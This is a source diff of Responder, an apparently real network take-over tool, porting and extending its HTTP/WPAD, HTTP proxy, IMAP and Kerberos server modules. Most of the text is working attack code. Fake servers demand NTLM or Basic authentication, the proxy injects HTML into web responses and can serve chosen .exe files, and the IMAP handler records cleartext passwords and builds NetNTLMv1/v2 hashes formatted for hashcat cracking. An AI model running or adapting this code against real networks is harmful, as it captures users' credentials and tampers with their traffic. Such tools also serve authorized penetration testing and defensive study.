+				print(text("[HTTP] Sending BASIC authentication request to %s" % client.replace("::ffff:","")))
 
 		else:
-			Response = IIS_Auth_401_Ans()
+			r = IIS_Auth_401_Ans()
+			r.calculate()
+			Response = r
 			if settings.Config.Verbose:
-				print text("[HTTP] Sending NTLM authentication request to %s" % client)
+				print(text("[HTTP] Sending NTLM authentication request to %s" % client.replace("::ffff:","")))
 
-		return str(Response)
+		return Response
 
 # HTTP Server class
 class HTTP(BaseRequestHandler):
-	def handle(self):
-		try:
-			self.request.settimeout(1)
-			data = self.request.recv(8092)
-			Buffer = WpadCustom(data, self.client_address[0])
-
-			if Buffer and settings.Config.Force_WPAD_Auth == False:
-				self.request.send(Buffer)
-				if settings.Config.Verbose:
-					print text("[HTTP] WPAD (no auth) file sent to %s" % self.client_address[0])
-
-			else:
-				Buffer = PacketSequence(data,self.client_address[0])
-				self.request.send(Buffer)
-		except socket.error:
-			pass
-
-# HTTPS Server class
-class HTTPS(StreamRequestHandler):
-	def setup(self):
-		self.exchange = self.request
-		self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
-		self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
 
 	def handle(self):
 		try:
-			data = self.exchange.recv(8092)
-			self.exchange.settimeout(0.5)
-			Buffer = WpadCustom(data,self.client_address[0])
-				
-			if Buffer and settings.Config.Force_WPAD_Auth == False:
-				self.exchange.send(Buffer)
-				if settings.Config.Verbose:
-					print text("[HTTPS] WPAD (no auth) file sent to %s" % self.client_address[0])
+			Challenge = RandomChallenge()
+			while True:
+				self.request.settimeout(3)
+				remaining = 10*1024*1024 #setting max recieve size
+				data = ''
+				while True:
+					buff = ''
+					buff = NetworkRecvBufferPython2or3(self.request.recv(8092))
+					if buff == '':
+						break
+					data += buff
+					remaining -= len(buff)
+					#check if we recieved the full header
+					if data.find('\r\n\r\n') != -1: 
+						#we did, now to check if there was anything else in the request besides the header
+						if data.find('Content-Length') == -1:
+							#request contains only header
+							break
+						else:
+							#searching for that content-length field in the header
+							for line in data.split('\r\n'):
+								if line.find('Content-Length') != -1:
+									line = line.strip()
+									remaining = int(line.split(':')[1].strip()) - len(data)
+					if remaining <= 0:
+						break
+				if data == "":
+					break
+				#now the data variable has the full request
+				Buffer = WpadCustom(data, self.client_address[0])
 
-			else:
-				Buffer = PacketSequence(data,self.client_address[0])
-				self.exchange.send(Buffer)
+				if Buffer and settings.Config.Force_WPAD_Auth == False:
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
+					self.request.close()
+					if settings.Config.Verbose:
+						print(text("[HTTP] WPAD (no auth) file sent to %s" % self.client_address[0].replace("::ffff:","")))
+
+				else:
+					Buffer = PacketSequence(data,self.client_address[0], Challenge)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
+		
 		except:
 			pass
+			
 

servers/HTTP_Proxy.py

@@ -14,13 +14,18 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import urlparse
+from utils import *
+if settings.Config.PY2OR3 == "PY3":
+	import urllib.parse as urlparse
+	import http.server as BaseHTTPServer
+else:
+	import urlparse
+	import BaseHTTPServer
+
 import select
 import zlib
-import BaseHTTPServer
-
 from servers.HTTP import RespondWithFile
-from utils import *
+
 
 IgnoredDomains = [ 'crl.comodoca.com', 'crl.usertrust.com', 'ocsp.comodoca.com', 'ocsp.usertrust.com', 'www.download.windowsupdate.com', 'crl.microsoft.com' ]
 
@@ -34,9 +39,9 @@ def InjectData(data, client, req_uri):
 	if settings.Config.Serve_Exe == True and req_uri.endswith('.exe'):
 		return RespondWithFile(client, settings.Config.Exe_Filename, os.path.basename(req_uri))
 
-	if len(data.split('\r\n\r\n')) > 1:
+	if len(data.split(b'\r\n\r\n')) > 1:
 		try:
-			Headers, Content = data.split('\r\n\r\n')
+			Headers, Content = data.split(b'\r\n\r\n')
 		except:
 			return data
 
@@ -44,30 +49,34 @@ def InjectData(data, client, req_uri):
 		if set(RedirectCodes) & set(Headers):
 			return data
 
-		if "content-encoding: gzip" in Headers.lower():
+		Len = b''.join(re.findall(b'(?<=Content-Length: )[^\r\n]*', Headers))
+
+		if b'content-encoding: gzip' in Headers.lower():
 			Content = zlib.decompress(Content, 16+zlib.MAX_WBITS)
 
-		if "content-type: text/html" in Headers.lower():
+		if b'content-type: text/html' in Headers.lower():
 			if settings.Config.Serve_Html:  # Serve the custom HTML if needed
 				return RespondWithFile(client, settings.Config.Html_Filename)
 
-			Len = ''.join(re.findall(r'(?<=Content-Length: )[^\r\n]*', Headers))
-			HasBody = re.findall(r'(<body[^>]*>)', Content)
 
-			if HasBody and len(settings.Config.HtmlToInject) > 2:
+			HasBody = re.findall(b'(<body[^>]*>)', Content, re.IGNORECASE)
+
+			if HasBody and len(settings.Config.HtmlToInject) > 2 and not req_uri.endswith('.js'):
 				if settings.Config.Verbose:
-					print text("[PROXY] Injecting into HTTP Response: %s" % color(settings.Config.HtmlToInject, 3, 1))
+					print(text("[PROXY] Injecting into HTTP Response: %s" % color(settings.Config.HtmlToInject, 3, 1)))
 
-				Content = Content.replace(HasBody[0], '%s\n%s' % (HasBody[0], settings.Config.HtmlToInject))
+				Content = Content.replace(HasBody[0], b'%s\n%s' % (HasBody[0], settings.Config.HtmlToInject.encode('latin-1')))
 
-		if "content-encoding: gzip" in Headers.lower():
+		if b'content-encoding: gzip' in Headers.lower():
 			Content = zlib.compress(Content)
 
-		Headers = Headers.replace("Content-Length: "+Len, "Content-Length: "+ str(len(Content)))
-		data = Headers +'\r\n\r\n'+ Content
+		Headers = Headers.replace(b'Content-Length: '+Len, b'Content-Length: '+ NetworkSendBufferPython2or3(len(Content)))
+		data = Headers +b'\r\n\r\n'+ Content
+
 	else:
 		if settings.Config.Verbose:
-			print text("[PROXY] Returning unmodified HTTP response")
+			print(text("[PROXY] Returning unmodified HTTP response"))
+
 	return data
 
 class ProxySock:
@@ -99,14 +108,14 @@ class ProxySock:
 				# Replace the socket by a connection to the proxy
 				self.socket = socket.socket(family, socktype, proto)
 				self.socket.connect(sockaddr)
-			except socket.error, msg:
+			except socket.error as msg:
 				if self.socket:
 					self.socket.close()
 				self.socket = None
 				continue
 			break
 		if not self.socket :
-			raise socket.error, msg
+			raise socket.error(msg)
 		
 		# Ask him to create a tunnel connection to the target host/port
 		self.socket.send(
@@ -121,7 +130,7 @@ class ProxySock:
 		
 		# Not 200 ?
 		if parts[1] != "200":
-			print color("[!] Error response from upstream proxy: %s" % resp, 1)
+			print(color("[!] Error response from upstream proxy: %s" % resp, 1))
 			pass
 
 	# Wrap all methods of inner socket, without any change
@@ -198,9 +207,9 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 	rbufsize = 0
 
 	def handle(self):
-		(ip, port) =  self.client_address
+		(ip, port) =  self.client_address[0], self.client_address[1]
 		if settings.Config.Verbose:
-			print text("[PROXY] Received connection from %s" % self.client_address[0])
+			print(text("[PROXY] Received connection from %s" % self.client_address[0].replace("::ffff:","")))
 		self.__base_handle()
 
 	def _connect_to(self, netloc, soc):
@@ -210,7 +219,7 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 		else:
 			host_port = netloc, 80
 		try: soc.connect(host_port)
-		except socket.error, arg:
+		except socket.error as arg:
 			try: msg = arg[1]
 			except: msg = arg
 			self.send_error(404, msg)
@@ -237,14 +246,15 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 
 		try:
 			if self._connect_to(self.path, soc):
-				self.wfile.write(self.protocol_version +" 200 Connection established\r\n")
-				self.wfile.write("Proxy-agent: %s\r\n" % self.version_string())
-				self.wfile.write("\r\n")
+				self.wfile.write(NetworkSendBufferPython2or3(self.protocol_version +" 200 Connection established\r\n"))
+				self.wfile.write(NetworkSendBufferPython2or3("Proxy-agent: %s\r\n"% self.version_string()))
+				self.wfile.write(NetworkSendBufferPython2or3("\r\n"))
 				try:
 					self._read_write(soc, 300)
 				except:
 					pass
 		except:
+			raise
 			pass
 
 		finally:
@@ -271,14 +281,14 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 			URL_Unparse = urlparse.urlunparse(('', '', path, params, query, ''))
 
 			if self._connect_to(netloc, soc):
-				soc.send("%s %s %s\r\n" % (self.command, URL_Unparse, self.request_version))
+				soc.send(NetworkSendBufferPython2or3("%s %s %s\r\n" % (self.command, URL_Unparse, self.request_version)))
 
 				Cookie = self.headers['Cookie'] if "Cookie" in self.headers else ''
 
 				if settings.Config.Verbose:
-					print text("[PROXY] Client        : %s" % color(self.client_address[0], 3))
-					print text("[PROXY] Requested URL : %s" % color(self.path, 3))
-					print text("[PROXY] Cookie        : %s" % Cookie)
+					print(text("[PROXY] Client        : %s" % color(self.client_address[0].replace("::ffff:",""), 3)))
+					print(text("[PROXY] Requested URL : %s" % color(self.path, 3)))
+					print(text("[PROXY] Cookie        : %s" % Cookie))
 
 				self.headers['Connection'] = 'close'
 				del self.headers['Proxy-Connection']
@@ -286,8 +296,8 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 				del self.headers['Range']
 				
 				for k, v in self.headers.items():
-					soc.send("%s: %s\r\n" % (k.title(), v))
-				soc.send("\r\n")
+					soc.send(NetworkSendBufferPython2or3("%s: %s\r\n" % (k.title(), v)))
+				soc.send(NetworkSendBufferPython2or3("\r\n"))
 
 				try:
 					self._read_write(soc, netloc)
@@ -325,13 +335,14 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 						try:
 							data = i.recv(4096)
 
-							if self.command == "POST" and settings.Config.Verbose:
-								print text("[PROXY] POST Data     : %s" % data)
+							if self.command == b'POST' and settings.Config.Verbose:
+								print(text("[PROXY] POST Data     : %s" % data))
 						except:
 							pass
 					if data:
 						try:
 							out.send(data)
+
 							count = 0
 						except:
 							pass

servers/IMAP.py

@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 # This file is part of Responder, a network take-over set of tools 
 # created and maintained by Laurent Gaffie.
-# email: laurent.gaffie@gmail.com
+# email: lgaffie@secorizon.com
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by
 # the Free Software Foundation, either version 3 of the License, or
@@ -14,36 +14,610 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import sys
+import base64
+import re
+import struct
+import os
+import ssl
 from utils import *
-from SocketServer import BaseRequestHandler
+
+if (sys.version_info > (3, 0)):
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+
 from packets import IMAPGreeting, IMAPCapability, IMAPCapabilityEnd
 
 class IMAP(BaseRequestHandler):
+	def __init__(self, *args, **kwargs):
+		self.tls_enabled = False
+		BaseRequestHandler.__init__(self, *args, **kwargs)
+	
+	def upgrade_to_tls(self):
+		"""Upgrade connection to TLS using Responder's SSL certificates"""
+		try:
+			# Get SSL certificate paths from Responder config
+			cert_path = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
+			key_path = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
+			
+			if not os.path.exists(cert_path) or not os.path.exists(key_path):
+				if settings.Config.Verbose:
+					print(text('[IMAP] SSL certificates not found'))
+				return False
+			
+			# Create SSL context
+			context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
+			context.load_cert_chain(cert_path, key_path)
+			
+			# Wrap socket
+			self.request = context.wrap_socket(self.request, server_side=True)
+			self.tls_enabled = True
+			
+			if settings.Config.Verbose:
+				print(text('[IMAP] Successfully upgraded to TLS from %s' % 
+					self.client_address[0].replace("::ffff:", "")))
+			
+			return True
+			
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[IMAP] TLS upgrade failed: %s' % str(e)))
+			return False
+	
+	def send_capability(self, tag="*"):
+		"""Send CAPABILITY response with STARTTLS if not already in TLS"""
+		if self.tls_enabled:
+			# After STARTTLS, don't advertise it again
+			self.request.send(NetworkSendBufferPython2or3(IMAPCapability()))
+		else:
+			# Before STARTTLS, advertise it
+			capability = "* CAPABILITY IMAP4 IMAP4rev1 AUTH=PLAIN AUTH=LOGIN AUTH=NTLM STARTTLS\r\n"
+			self.request.send(NetworkSendBufferPython2or3(capability))
+		
+		if tag != "*":
+			self.request.send(NetworkSendBufferPython2or3(IMAPCapabilityEnd(Tag=tag)))
+	
 	def handle(self):
 		try:
-			self.request.send(str(IMAPGreeting()))
-			data = self.request.recv(1024)
-
-			if data[5:15] == "CAPABILITY":
-				RequestTag = data[0:4]
-				self.request.send(str(IMAPCapability()))
-				self.request.send(str(IMAPCapabilityEnd(Tag=RequestTag)))
+			# Send greeting
+			self.request.send(NetworkSendBufferPython2or3(IMAPGreeting()))
+			
+			# Main loop to handle multiple commands
+			while True:
 				data = self.request.recv(1024)
-
-			if data[5:10] == "LOGIN":
-				Credentials = data[10:].strip()
-
+				
+				if not data:
+					break
+				
+				# Handle CAPABILITY command
+				if b'CAPABILITY' in data.upper():
+					RequestTag = self.extract_tag(data)
+					self.send_capability(RequestTag)
+					continue
+				
+				# Handle STARTTLS command
+				if b'STARTTLS' in data.upper():
+					RequestTag = self.extract_tag(data)
+					
+					if self.tls_enabled:
+						# Already in TLS
+						response = "%s BAD STARTTLS already in TLS\r\n" % RequestTag
+						self.request.send(NetworkSendBufferPython2or3(response))
+						continue
+					
+					# Send OK response before upgrading
+					response = "%s OK Begin TLS negotiation now\r\n" % RequestTag
+					self.request.send(NetworkSendBufferPython2or3(response))
+					
+					# Upgrade to TLS
+					if not self.upgrade_to_tls():
+						# TLS upgrade failed, close connection
+						break
+					
+					# Continue handling commands over TLS
+					continue
+				
+				# Handle LOGIN command
+				if b'LOGIN' in data.upper():
+					success = self.handle_login(data)
+					if success:
+						break
+					continue
+				
+				# Handle AUTHENTICATE PLAIN
+				if b'AUTHENTICATE PLAIN' in data.upper():
+					success = self.handle_authenticate_plain(data)
+					if success:
+						break
+					continue
+				
+				# Handle AUTHENTICATE LOGIN
+				if b'AUTHENTICATE LOGIN' in data.upper():
+					success = self.handle_authenticate_login(data)
+					if success:
+						break
+					continue
+				
+				# Handle AUTHENTICATE NTLM
+				if b'AUTHENTICATE NTLM' in data.upper():
+					success = self.handle_authenticate_ntlm(data)
+					if success:
+						break
+					continue
+				
+				# Handle LOGOUT
+				if b'LOGOUT' in data.upper():
+					RequestTag = self.extract_tag(data)
+					response = "* BYE IMAP4 server logging out\r\n"
+					response += "%s OK LOGOUT completed\r\n" % RequestTag
+					self.request.send(NetworkSendBufferPython2or3(response))
+					break
+				
+				# Unknown command - send error
+				RequestTag = self.extract_tag(data)
+				response = "%s BAD Command not recognized\r\n" % RequestTag
+				self.request.send(NetworkSendBufferPython2or3(response))
+		
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[IMAP] Exception: %s' % str(e)))
+			pass
+	
+	def extract_tag(self, data):
+		"""Extract IMAP command tag (e.g., 'A001' from 'A001 LOGIN ...')"""
+		try:
+			parts = data.decode('latin-1', errors='ignore').split()
+			if parts:
+				return parts[0]
+		except:
+			pass
+		return "A001"
+	
+	def handle_login(self, data):
+		"""
+		Handle LOGIN command
+		Format: TAG LOGIN username password
+		Credentials can be quoted or unquoted
+		"""
+		try:
+			RequestTag = self.extract_tag(data)
+			
+			# Decode the data
+			data_str = data.decode('latin-1', errors='ignore').strip()
+			
+			# Remove tag and LOGIN command
+			# Pattern: TAG LOGIN credentials
+			login_match = re.search(r'LOGIN\s+(.+)', data_str, re.IGNORECASE)
+			if not login_match:
+				response = "%s BAD LOGIN command syntax error\r\n" % RequestTag
+				self.request.send(NetworkSendBufferPython2or3(response))
+				return False
+			
+			credentials_part = login_match.group(1).strip()
+			
+			# Parse credentials - can be quoted or unquoted
+			username, password = self.parse_credentials(credentials_part)
+			
+			if username and password:
+				# Save credentials
 				SaveToDb({
 					'module': 'IMAP', 
 					'type': 'Cleartext', 
 					'client': self.client_address[0], 
-					'user': Credentials[0], 
-					'cleartext': Credentials[1], 
-					'fullhash': Credentials[0]+":"+Credentials[1],
+					'user': username, 
+					'cleartext': password, 
+					'fullhash': username + ":" + password,
 				})
+				
+				if settings.Config.Verbose:
+					print(text('[IMAP] LOGIN captured: %s:%s from %s' % (
+						username, password, self.client_address[0])))
+				
+				# Send success but then close
+				response = "%s OK LOGIN completed\r\n" % RequestTag
+				self.request.send(NetworkSendBufferPython2or3(response))
+				return True
+			else:
+				# Invalid credentials format
+				response = "%s BAD LOGIN credentials format error\r\n" % RequestTag
+				self.request.send(NetworkSendBufferPython2or3(response))
+				return False
+		
+		except Exception as e:
+			return False
+	
+	def parse_credentials(self, creds_str):
+		"""
+		Parse username and password from LOGIN command
+		Supports: "user" "pass", user pass, {5}user {8}password (literal strings)
+		"""
+		try:
+			# Method 1: Quoted strings "user" "pass"
+			quoted_match = re.findall(r'"([^"]*)"', creds_str)
+			if len(quoted_match) >= 2:
+				return quoted_match[0], quoted_match[1]
+			
+			# Method 2: Space-separated (unquoted)
+			parts = creds_str.split()
+			if len(parts) >= 2:
+				# Remove any curly brace literals {5}
+				user = re.sub(r'^\{\d+\}', '', parts[0])
+				passwd = re.sub(r'^\{\d+\}', '', parts[1])
+				return user, passwd
+			
+			return None, None
+		
+		except:
+			return None, None
+	
+	def handle_authenticate_plain(self, data):
+		"""Handle AUTHENTICATE PLAIN command - can be single-line or multi-line"""
+		try:
+			RequestTag = self.extract_tag(data)
+			data_str = data.decode('latin-1', errors='ignore').strip()
+			plain_match = re.search(r'AUTHENTICATE\s+PLAIN\s+(.+)', data_str, re.IGNORECASE)
+			
+			if plain_match:
+				b64_creds = plain_match.group(1).strip()
+			else:
+				response = "+\r\n"
+				self.request.send(NetworkSendBufferPython2or3(response))
+				cred_data = self.request.recv(1024)
+				if not cred_data:
+					return False
+				b64_creds = cred_data.decode('latin-1', errors='ignore').strip()
+			
+			try:
+				decoded = base64.b64decode(b64_creds).decode('latin-1', errors='ignore')
+				parts = decoded.split('\x00')
+				
+				if len(parts) >= 3:
+					username = parts[1]
+					password = parts[2]
+				elif len(parts) >= 2:
+					username = parts[0]
+					password = parts[1]
+				else:
+					raise ValueError("Invalid PLAIN format")
+				
+				if username and password:
+					SaveToDb({
+						'module': 'IMAP', 
+						'type': 'Cleartext', 
+						'client': self.client_address[0], 
+						'user': username, 
+						'cleartext': password, 
+						'fullhash': username + ":" + password,
+					})
+					
+					if settings.Config.Verbose:
+						print(text('[IMAP] AUTHENTICATE PLAIN captured: %s:%s from %s' % (
+							username, password, self.client_address[0])))
+					
+					response = "%s OK AUTHENTICATE completed\r\n" % RequestTag
+					self.request.send(NetworkSendBufferPython2or3(response))
+					return True
+			
+			except Exception as e:
+				response = "%s NO AUTHENTICATE failed\r\n" % RequestTag
+				self.request.send(NetworkSendBufferPython2or3(response))
+				return False
+		
+		except Exception as e:
+			return False
+	
+	def handle_authenticate_login(self, data):
+		"""Handle AUTHENTICATE LOGIN command - prompts for username, then password"""
+		try:
+			RequestTag = self.extract_tag(data)
+			
+			response = "+ " + base64.b64encode(b"Username:").decode('latin-1') + "\r\n"
+			self.request.send(NetworkSendBufferPython2or3(response))
+			
+			user_data = self.request.recv(1024)
+			if not user_data:
+				return False
+			
+			username_b64 = user_data.decode('latin-1', errors='ignore').strip()
+			username = base64.b64decode(username_b64).decode('latin-1', errors='ignore')
+			
+			response = "+ " + base64.b64encode(b"Password:").decode('latin-1') + "\r\n"
+			self.request.send(NetworkSendBufferPython2or3(response))
+			
+			pass_data = self.request.recv(1024)
+			if not pass_data:
+				return False
+			
+			password_b64 = pass_data.decode('latin-1', errors='ignore').strip()
+			password = base64.b64decode(password_b64).decode('latin-1', errors='ignore')
+			
+			if username and password:
+				SaveToDb({
+					'module': 'IMAP', 
+					'type': 'Cleartext', 
+					'client': self.client_address[0], 
+					'user': username, 
+					'cleartext': password, 
+					'fullhash': username + ":" + password,
+				})
+				
+				if settings.Config.Verbose:
+					print(text('[IMAP] AUTHENTICATE LOGIN captured: %s:%s from %s' % (
+						username, password, self.client_address[0])))
+				
+				response = "%s OK AUTHENTICATE completed\r\n" % RequestTag
+				self.request.send(NetworkSendBufferPython2or3(response))
+				return True
+			else:
+				response = "%s NO AUTHENTICATE failed\r\n" % RequestTag
+				self.request.send(NetworkSendBufferPython2or3(response))
+				return False
+		
+		except Exception as e:
+			return False
+	
+	def handle_authenticate_ntlm(self, data):
+		"""Handle AUTHENTICATE NTLM command - implements challenge-response"""
+		try:
+			RequestTag = self.extract_tag(data)
+			
+			response = "+\r\n"
+			self.request.send(NetworkSendBufferPython2or3(response))
+			
+			type1_data = self.request.recv(2048)
+			if not type1_data:
+				return False
+			
+			type1_b64 = type1_data.decode('latin-1', errors='ignore').strip()
+			
+			try:
+				type1_msg = base64.b64decode(type1_b64)
+			except:
+				return False
+			
+			type2_msg = self.generate_ntlm_type2()
+			type2_b64 = base64.b64encode(type2_msg).decode('latin-1')
+			
+			response = "+ %s\r\n" % type2_b64
+			self.request.send(NetworkSendBufferPython2or3(response))
+			
+			type3_data = self.request.recv(4096)
+			if not type3_data:
+				return False
+			
+			type3_b64 = type3_data.decode('latin-1', errors='ignore').strip()
+			
+			if type3_b64 == '*' or type3_b64 == '':
+				if settings.Config.Verbose:
+					print(text('[IMAP] Client cancelled NTLM authentication'))
+				response = "%s NO AUTHENTICATE cancelled\r\n" % RequestTag
+				self.request.send(NetworkSendBufferPython2or3(response))
+				return False
+			
+			if not all(c in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\r\n' for c in type3_b64):
+				response = "%s NO AUTHENTICATE failed\r\n" % RequestTag
+				self.request.send(NetworkSendBufferPython2or3(response))
+				return False
+			
+			try:
+				type3_msg = base64.b64decode(type3_b64)
+			except Exception as e:
+				response = "%s NO AUTHENTICATE failed\r\n" % RequestTag
+				self.request.send(NetworkSendBufferPython2or3(response))
+				return False
+			
+			ntlm_hash = self.parse_ntlm_type3(type3_msg, type2_msg)
+			
+			if ntlm_hash:
+				if settings.Config.Verbose:
+					print(text('[IMAP] NTLM hash captured: %s from %s' % (
+						ntlm_hash['user'], self.client_address[0])))
+				
+				SaveToDb(ntlm_hash)
+				
+				response = "%s OK AUTHENTICATE completed\r\n" % RequestTag
+				self.request.send(NetworkSendBufferPython2or3(response))
+				return True
+			else:
+				response = "%s NO AUTHENTICATE failed\r\n" % RequestTag
+				self.request.send(NetworkSendBufferPython2or3(response))
+				return False
+		
+		except Exception as e:
+			return False
+	
+	def generate_ntlm_type2(self):
+		"""Generate NTLM Type 2 (Challenge) message with target info for NTLMv2"""
+		import time
+		
+		challenge = os.urandom(8)
+		self.ntlm_challenge = challenge
+		
+		target_name = b'W\x00O\x00R\x00K\x00G\x00R\x00O\x00U\x00P\x00'
+		target_name_len = len(target_name)
+		
+		target_info = b''
+		
+		domain_name = b'W\x00O\x00R\x00K\x00G\x00R\x00O\x00U\x00P\x00'
+		target_info += struct.pack('<HH', 0x0002, len(domain_name))
+		target_info += domain_name
+		
+		computer_name = b'S\x00E\x00R\x00V\x00E\x00R\x00'
+		target_info += struct.pack('<HH', 0x0001, len(computer_name))
+		target_info += computer_name
+		
+		dns_domain = b'w\x00o\x00r\x00k\x00g\x00r\x00o\x00u\x00p\x00'
+		target_info += struct.pack('<HH', 0x0004, len(dns_domain))
+		target_info += dns_domain
+		
+		dns_computer = b's\x00e\x00r\x00v\x00e\x00r\x00'
+		target_info += struct.pack('<HH', 0x0003, len(dns_computer))
+		target_info += dns_computer
+		
+		timestamp = int((time.time() + 11644473600) * 10000000)
+		target_info += struct.pack('<HH', 0x0007, 8)
+		target_info += struct.pack('<Q', timestamp)
+		
+		target_info += struct.pack('<HH', 0x0000, 0)
+		
+		target_info_len = len(target_info)
+		
+		target_name_offset = 48
+		target_info_offset = target_name_offset + target_name_len
+		
+		signature = b'NTLMSSP\x00'
+		msg_type = struct.pack('<I', 2)
+		
+		target_name_fields = struct.pack('<HHI', target_name_len, target_name_len, target_name_offset)
+		
+		flags = b'\x05\x02\x81\xa2'
+		
+		context = b'\x00' * 8
+		
+		target_info_fields = struct.pack('<HHI', target_info_len, target_info_len, target_info_offset)
+		
+		type2_msg = (signature + msg_type + target_name_fields + flags + 
+					 challenge + context + target_info_fields + target_name + target_info)
+		
+		return type2_msg
+	
+	def parse_ntlm_type3(self, type3_msg, type2_msg):
+		"""Parse NTLM Type 3 (Authenticate) message and extract NetNTLMv2 hash"""
+		try:
+			from binascii import hexlify
+			
+			if type3_msg[:8] != b'NTLMSSP\x00':
+				return None
+			
+			msg_type = struct.unpack('<I', type3_msg[8:12])[0]
+			if msg_type != 3:
+				return None
+			
+			lm_len, lm_maxlen, lm_offset = struct.unpack('<HHI', type3_msg[12:20])
+			ntlm_len, ntlm_maxlen, ntlm_offset = struct.unpack('<HHI', type3_msg[20:28])
+			domain_len, domain_maxlen, domain_offset = struct.unpack('<HHI', type3_msg[28:36])
+			user_len, user_maxlen, user_offset = struct.unpack('<HHI', type3_msg[36:44])
+			ws_len, ws_maxlen, ws_offset = struct.unpack('<HHI', type3_msg[44:52])
+			
+			if user_offset + user_len <= len(type3_msg):
+				user = type3_msg[user_offset:user_offset+user_len].decode('utf-16le', errors='ignore')
+			else:
+				user = "unknown"
+			
+			if domain_offset + domain_len <= len(type3_msg):
+				domain = type3_msg[domain_offset:domain_offset+domain_len].decode('utf-16le', errors='ignore')
+			else:
+				domain = ""
+			
+			if ntlm_offset + ntlm_len <= len(type3_msg):
+				ntlm_response = type3_msg[ntlm_offset:ntlm_offset+ntlm_len]
+			else:
+				return None
+			
+			if len(ntlm_response) > 24:
+				ntlmv2_response = ntlm_response[:16]
+				ntlmv2_blob = ntlm_response[16:]
+				
+				challenge = type2_msg[24:32]
+				
+				hash_str = "%s::%s:%s:%s:%s" % (
+					user,
+					domain,
+					hexlify(challenge).decode(),
+					hexlify(ntlmv2_response).decode(),
+					hexlify(ntlmv2_blob).decode()
+				)
+				
+				if settings.Config.Verbose:
+					print(text('[IMAP] NetNTLMv2 hash format (hashcat -m 5600)'))
+				
+				return {
+					'module': 'IMAP',
+					'type': 'NetNTLMv2',
+					'client': self.client_address[0],
+					'user': user,
+					'domain': domain,
+					'hash': hash_str,
+					'fullhash': hash_str
+				}
+			else:
+				ntlm_hash = ntlm_response[:24]
+				challenge = type2_msg[24:32]
+				
+				if lm_offset + lm_len <= len(type3_msg) and lm_len == 24:
+					lm_hash = type3_msg[lm_offset:lm_offset+lm_len]
+				else:
+					lm_hash = b'\x00' * 24
+				
+				hash_str = "%s::%s:%s:%s:%s" % (
+					user,
+					domain,
+					hexlify(lm_hash).decode(),
+					hexlify(ntlm_hash).decode(),
+					hexlify(challenge).decode()
+				)
+				
+				if settings.Config.Verbose:
+					print(text('[IMAP] NetNTLMv1 hash format (hashcat -m 5500)'))
+				
+				return {
+					'module': 'IMAP',
+					'type': 'NetNTLMv1',
+					'client': self.client_address[0],
+					'user': user,
+					'domain': domain,
+					'hash': hash_str,
+					'fullhash': hash_str
+				}
+		
+		except Exception as e:
+			return None
 
-				## FIXME: Close connection properly
-				## self.request.send(str(ditchthisconnection()))
-				## data = self.request.recv(1024)
-		except Exception:
-			pass
+class IMAPS(IMAP):
+	"""IMAP over SSL (port 993) - SSL wrapper that inherits from IMAP"""
+	
+	def setup(self):
+		"""Setup SSL socket before handling - called automatically by SocketServer"""
+		try:
+			# Get SSL certificate paths from Responder config
+			cert_path = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
+			key_path = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
+			
+			if not os.path.exists(cert_path) or not os.path.exists(key_path):
+				if settings.Config.Verbose:
+					print(text('[IMAPS] SSL certificates not found'))
+				self.request.close()
+				return
+			
+			# Create SSL context
+			context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
+			context.load_cert_chain(cert_path, key_path)
+			
+			# Wrap socket in SSL before IMAP handles it
+			self.request = context.wrap_socket(self.request, server_side=True)
+			
+			# Mark as already in TLS so STARTTLS isn't advertised
+			self.tls_enabled = True
+			
+			if settings.Config.Verbose:
+				print(text('[IMAPS] SSL connection from %s' % 
+					self.client_address[0].replace("::ffff:", "")))
+			
+		except ssl.SSLError as e:
+			# Client rejected self-signed cert - suppress expected errors
+			if 'ALERT_BAD_CERTIFICATE' not in str(e) and settings.Config.Verbose:
+				print(text('[IMAPS] SSL handshake failed: %s' % str(e)))
+			try:
+				self.request.close()
+			except:
+				pass
+		except Exception as e:
+			if 'Bad file descriptor' not in str(e) and settings.Config.Verbose:
+				print(text('[IMAPS] SSL setup error: %s' % str(e)))
+			try:
+				self.request.close()
+			except:
+				pass
+	
+	# handle() method is inherited from IMAP class - no need to override!

servers/Kerberos.py

@@ -14,126 +14,870 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from SocketServer import BaseRequestHandler
-from utils import *
+import codecs
 import struct
+import time
+from utils import *
 
-def ParseMSKerbv5TCP(Data):
-	MsgType     = Data[21:22]
-	EncType     = Data[43:44]
-	MessageType = Data[32:33]
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
 
-	if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02":
-		if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33":
-			HashLen = struct.unpack('<b',Data[50:51])[0]
-			if HashLen == 54:
-				Hash       = Data[53:105]
-				SwitchHash = Hash[16:]+Hash[0:16]
-				NameLen    = struct.unpack('<b',Data[153:154])[0]
-				Name       = Data[154:154+NameLen]
